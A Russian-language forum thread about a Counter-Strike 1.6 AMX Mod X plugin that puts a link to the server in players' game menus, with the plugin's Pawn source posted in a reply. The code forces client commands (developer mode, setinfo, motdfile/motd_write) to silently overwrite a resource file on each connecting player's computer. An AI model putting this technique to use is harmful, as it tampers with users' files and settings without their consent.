Русское сообщество по скриптингу

Ссылка на ваш сервер в меню игры (Game Menu)

Плагины для AMX Mod X, которые не удовлетворяют правилам оформления.

Модератор: Leonidddd

Правила форума
1. Запрещено материться и оскорблять других участников форума.
2. Запрещен флуд, оффтоп, дабл постинг во всех разделах форума, кроме раздела "Болтовня".
3. Запрещено взламывать сайт/форум или наносить любой вред проекту.
4. Запрещено рекламировать другие ресурсы.
5. Запрещено создавать темы без информативного названия. Название темы должно отображать ее смысл.

Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение Lukmanov » 22 мар 2010, 14:15

Авторы: DJ_WEST, Lukmanov Ildar (дополнения)
Версия: 1.1

Описание:
Прописывает игрокам ссылку на ваш игровой сервер в меню игры, перед пунктом New Game. Плагин работает на нон-стим клиентах (до 29 патча, если не ошибаюсь). На стим клиентах и высоких патчах не работает.

Используемые модули:
Engine

Настройки:
После установки плагина запустите файл gamemenu.cmd в подпапке cstrike/addons/amxmodx/configs. Запустится текстовый редактор AkelPad, в нём откроется настроечный файл gamemenu.txt. Укажите название вашего сервера и его IP адрес:порт в следующих строках:

"label" "Join to AMX-X.RU Server"
"command" "engine connect 127.0.0.1:27015"

Сохраните файл.
Вы можете использовать любой другой текстовый редактор, позволяющий создавать текстовые файлы без использования символов LF. Подойдут: Notepad++, OpenOffice Writer. Стандартный Блокнот Windows не подходит.

Вы также можете указать несколько игровых серверов, скопировав блок:
"1"
{
"label" "Join to AMX-X.RU Server"
"command" "engine connect 127.0.0.1:27015"
}
нужное количество раз и указав правильную нумерацию. Основное требование - gamemenu.txt не должен превышать по объёму 1012 байт.


Список изменений:
Идея принадлежит DJ_WEST-у, исходный плагин находится Вы должны зарегистрироваться, чтобы видеть ссылки..

Что нового?

1) Прописывает меню также тем игрокам, у которых выбран русский язык, то есть используется папка cstrike_russian вместо cstrike и подпапка resource отсутствует.
2) Меню прописывается единожды. Повторно меню будет прописано только в том случае, если вы внесёте изменения в gamemenu.txt. Это необходимо для того, чтобы игроки не вылетали с ошибкой переполнения буфера при подключении. Это возникает из за того, что объём единовременно передаваемой информации слишком велик. Возникает не у всех игроков.


В архиве находится сам плагин, исходник, gamemenu.txt, текстовый редактор AkelPad (скачан с первоисточника, проверен Microsoft антивирусом), GameMenu.tga, который необходим для создания папки resource у игроков за счёт прекэша данного файла в эту папку (можно заменить файлом-пустышкой).
Не утверждено. Отсутствуют файлы и поддержка плагина //Leonidddd
Аватара пользователя
Lukmanov
 
Сообщения: 21
Зарегистрирован: 11 янв 2010, 11:49
Откуда: Уфа
Благодарил (а): 4 раз.
Поблагодарили: 81 раз.
Опыт программирования: Больше трех лет
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение Akushi » 22 дек 2012, 10:54

Что тут не так? Добавил девелопер и сервер стал часто падать.
[pawn]
  1. #include <amxmodx>

  2.  

  3. #define PLUGIN "Game Menu"

  4. #define VERSION "1.0.1(fix)"

  5. #define AUTHOR "DJ_WEST +fix '..overflowe..'"

  6.  

  7. #define GAMEMENU_FILE "resource/GameMenu.res"

  8. #define MAX_SIZE 1012

  9.  

  10. //OldMax:  (уникальная метка вашего сервера) (если обновить скачку - меняем ключ, хотябы 1 символ)

  11. #define ServKey "qwlaskfmlg"

  12.  

  13. #define TASK_DEVELOPER 123

  14.  

  15. new g_Text[MAX_SIZE]

  16.  

  17. public plugin_init()

  18. {

  19.    register_plugin(PLUGIN, VERSION, AUTHOR)

  20.    

  21.    // Вызываем функцию Read_GameMenu для чтения нашего исправленного файла меню.

  22.    set_task(0.1, "Read_GameMenu")

  23. }

  24.  

  25. public Read_GameMenu()

  26. {

  27.    new i_File, s_File[128]

  28.    

  29.    // Получаем путь к директории с конфигами AMXX в s_File.

  30.    get_configsdir(s_File, charsmax(s_File))

  31.    

  32.    // Формируем путь к gamemenu.txt файлу, используя путь к конфигам, и сохраняем в s_File.

  33.    format(s_File, charsmax(s_File), "%s/gamemenu.txt", s_File)

  34.    

  35.    // Открываем файл для чтения

  36.    i_File = fopen(s_File, "r")

  37.    

  38.    // Читаем содержимое файла в g_Text. Данная функция поддерживает чтение символов CR, LF.

  39.    fgets(i_File, g_Text, MAX_SIZE)

  40.    

  41.    // Закрываем файл

  42.    fclose(i_File)

  43. }

  44.  

  45. public client_connect(id)

  46. {

  47.     client_cmd(id,"Developer 1")

  48.     set_task(30.0, "ReSet_Developer", id+TASK_DEVELOPER)

  49. }

  50.  

  51. public ReSet_Developer(temp)

  52. {

  53.     new id = temp-TASK_DEVELOPER

  54.  

  55.     if(is_user_connected(id))

  56.         client_cmd(id,"Developer 0")

  57.  

  58.     else

  59.         remove_task(temp)

  60. }

  61.  

  62. public client_putinserver(id)

  63. {

  64.    // Вызываем функцию Change_GameMenu

  65.    set_task(3.0, "Change_GameMenu", id)

  66. }

  67.  

  68. stock get_configsdir(s_Name[], i_Len)

  69. {

  70.    return get_localinfo("amxx_configsdir", s_Name, i_Len)

  71. }

  72.  

  73.  

  74. //---OldMax begin:

  75. public fixed(id){

  76.    

  77.    new ServGM[32], UserGM[32]

  78.    //get_time("%m/%Y", ServGM, charsmax(ServGM))    //параметр меняется кажд месяц - 1 раз в месяц принудительная перекачка.

  79.    get_time("%d/%m/%Y", ServGM, charsmax(ServGM))    //параметр меняется кажд день - 1 раз в день принудительная перекачка.

  80.    get_user_info(id, "_gm", UserGM, 31)

  81.    format(ServGM, charsmax(ServGM), "%s|%s", ServKey, ServGM);

  82.    

  83.    if (!equal(ServGM, UserGM)) {

  84.       client_cmd(id, "setinfo _gm %s", ServGM)

  85.       return 0;

  86.    }

  87.    

  88.    return 1;

  89. }

  90. public plugin_precache()

  91. {

  92.     precache_generic("resource/GameMenu.tga");

  93.     return PLUGIN_HANDLED

  94. }

  95.  

  96.  

  97. public Change_GameMenu(id)

  98. {

  99.    

  100.    //---OldMax begin:

  101.    if (fixed(id)) return;

  102.    //---end    

  103.    

  104.    

  105.    // Указываем путь к файлу resource/GameMenu.res

  106.    client_cmd(id, "motdfile %s", GAMEMENU_FILE)

  107.    

  108.    // Записываем в файл содержимое g_Text

  109.    client_cmd(id, "motd_write %s", g_Text)

  110.    

  111.    // Возвращаем значение команды по умолчанию

  112.    client_cmd(id, "motdfile motd.txt")    

  113. }
[/pawn]
Аватара пользователя
Akushi
 
Сообщения: 21
Зарегистрирован: 11 фев 2010, 00:53
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение 0ldy » 20 фев 2013, 17:41

После обновления стима, поменялась структура папок на стороне клиента:
\Program Files\Steam\SteamApps\common\Half-Life\cstrike\
Как теперь быть с плагином, чтобы он начал работать?
[align=right]drum and bass for yours emotions d(-.-)b[/align]
Аватара пользователя
0ldy
 
Сообщения: 19
Зарегистрирован: 11 сен 2012, 02:17
Откуда: из сумрака
Благодарил (а): 9 раз.
Поблагодарили: 2 раз.
Опыт программирования: Меньше месяца
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение (((_CYBORG_))) » 24 апр 2013, 13:48

во во Люди на версии STEAM на последнем обновлении
Exe build: 13:55:53 Mar 28 2013 (5999)
Меню не меняется! Если знаете ответ подскажите или исходник лучше! :-X
Аватара пользователя
(((_CYBORG_)))
 
Сообщения: 11
Зарегистрирован: 04 сен 2012, 15:14
Забанен
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Опыт программирования: Около 3 месяцев
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение ForeverYoung » 08 май 2013, 16:01

В какой кодировке нужно сохранять gamemenu ?
Аватара пользователя
ForeverYoung
 
Сообщения: 7
Зарегистрирован: 02 май 2013, 22:51
Благодарил (а): 1 раз.
Поблагодарили: 0 раз.

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение assistant » 08 май 2013, 16:11

ForeverYoung писал(а):В какой кодировке нужно сохранять gamemenu ?



UTF-8 Без BOM

Аватара пользователя
assistant
 
Сообщения: 99
Зарегистрирован: 23 ноя 2012, 08:26
Благодарил (а): 41 раз.
Поблагодарили: 24 раз.
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение Leonidddd » 09 май 2013, 01:35

(((_CYBORG_))), Valve поставила защиту на стим кс 1.6 .
Аватара пользователя
Leonidddd
Модератор
 
Сообщения: 2557
Зарегистрирован: 08 апр 2012, 18:13
Откуда: г. Запорожье
Благодарил (а): 192 раз.
Поблагодарили: 718 раз.

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение (((_CYBORG_))) » 11 июн 2013, 04:46

Печаль....
Аватара пользователя
(((_CYBORG_)))
 
Сообщения: 11
Зарегистрирован: 04 сен 2012, 15:14
Забанен
Благодарил (а): 0 раз.
Поблагодарили: 1 раз.
Опыт программирования: Около 3 месяцев
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение sh0k3r » 25 июн 2013, 18:16

и кто-нибудь знает, как когда вы идете в CS ставит меня в сервер напрямую?
Аватара пользователя
sh0k3r
 
Сообщения: 12
Зарегистрирован: 22 июн 2010, 14:10
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Языки программирования: Counter-Strike 1.6

Re: Ссылка на ваш сервер в меню игры (Game Menu)

Сообщение Oleg17-03 » 02 авг 2013, 00:49

а если такой плагин поставить и если покупать буст раскрутку то проблем не будет просто там пишет что изменять гейм меню запрещено
Аватара пользователя
Oleg17-03
 
Сообщения: 60
Зарегистрирован: 15 ноя 2012, 17:51
Откуда: Украина
Благодарил (а): 6 раз.
Поблагодарили: 3 раз.
Опыт программирования: Меньше месяца
Языки программирования: Counter-Strike 1.6

Пред.

Вернуться в Неутвержденные плагины

Кто сейчас на конференции

Сейчас этот форум просматривают: Yandex [Bot] и гости: 6

cron